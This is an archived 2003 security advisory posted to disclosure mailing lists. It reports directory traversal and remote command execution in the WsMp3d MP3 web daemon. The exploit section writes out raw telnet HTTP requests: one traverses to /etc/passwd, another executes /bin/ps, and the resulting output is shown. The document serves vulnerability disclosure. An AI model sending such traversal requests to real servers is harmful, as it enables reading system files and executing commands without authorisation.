[VulnWatch] [INetCop Security Advisory] WsMP3d Directory Traversing Vulnerability.

From: dong-h0un U (xploit_at_hackermail.com)
Date: 05/21/03

  • Next message: dong-h0un U: "[VulnWatch] [INetCop Security Advisory] Remote Heap Corruption Overflow vulnerability in WsMp3d."
    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org
    Date: Wed, 21 May 2003 22:13:09 +0800
    
    

            ==========================================
            INetCop Security Advisory #2003-0x82-017.a
            ==========================================

    * Title: WsMP3d Directory Traversing Vulnerability

    0x01. Description

    WsMp3d is daemon that can enjoy mp3.
    This daemon can approach in web, directory traversing bug exists.
    Also, can execute command in remote.

    0x02. Vulnerable Packages

    Vendor site: http://wsmp3.sourceforge.net/

    WsMp3-0.0.10.tar.gz version.
    +Linux
    WsMp3-0.0.9.tar.gz version.
    WsMp3-0.0.8.tar.gz version.
    web_server-0.0.7.tar.gz version.
    web_server-0.0.6.tar.gz version.
    web_server-0.0.5.tar.gz version.
    web_server-0.0.4.tar.gz version.
    web_server-0.0.3.tar.gz version.
    web_server-0.0.2.tar.gz version.
    web_server-0.0.1.tar.gz version.

    0x03. Exploit

    #1) Directory traversing exploit:

    As following, see file in directory.

    http://wsmp3.server.com/cmd:ls

    In this way, use directory that know.

    bash$ telnet wsmp3.server.com 8000
    Trying 61.37.xxx.xx...
    Connected to 61.37.xxx.xx.
    Escape character is '^]'.
    GET /dir/../../../../../../etc/passwd HTTP/1.0

    ... passwd file here ...

    Ok, it's possible to read `/etc/passwd' file !
    If it's executed by root ?? hehehe ;-)

    #2) Remote execute command exploit:

    bash$ telnet wsmp3.server.com 8000
    Trying 61.37.xxx.xx...
    Connected to 61.37.xxx.xx.
    Escape character is '^]'.
    POST /dir/../../../../../../bin/ps HTTP/1.0
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    Date: Sat May 03 01:25:28 2003
    Last-Modified: Sat May 03 01:25:28 2003
    Content-Length: 201

      PID TTY TIME CMD
    29529 pts/2 00:00:00 login
    29559 pts/2 00:00:00 su
    29560 pts/2 00:00:00 bash
    29681 pts/2 00:00:10 WsMp3
    29730 pts/2 00:00:00 WsMp3
    29731 pts/2 00:00:00 ps
    Connection closed by foreign host.
    bash$

    0x04. Patch

    It can solve as chroot() function. :-)

    P.S: Sorry, for my poor english.

    --
    By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.
    MSN & E-mail: szoahc(at)hotmail(dot)com,
                  xploit(at)hackermail(dot)com
    INetCop Security Home: http://www.inetcop.org (Korean hacking game)
                 My World: http://x82.i21c.net & http://x82.inetcop.org
    GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
    --
    -- 
    _______________________________________________
    Get your free email from http://www.hackermail.com
    Powered by Outblaze
    

  • Next message: dong-h0un U: "[VulnWatch] [INetCop Security Advisory] Remote Heap Corruption Overflow vulnerability in WsMp3d."

    Relevant Pages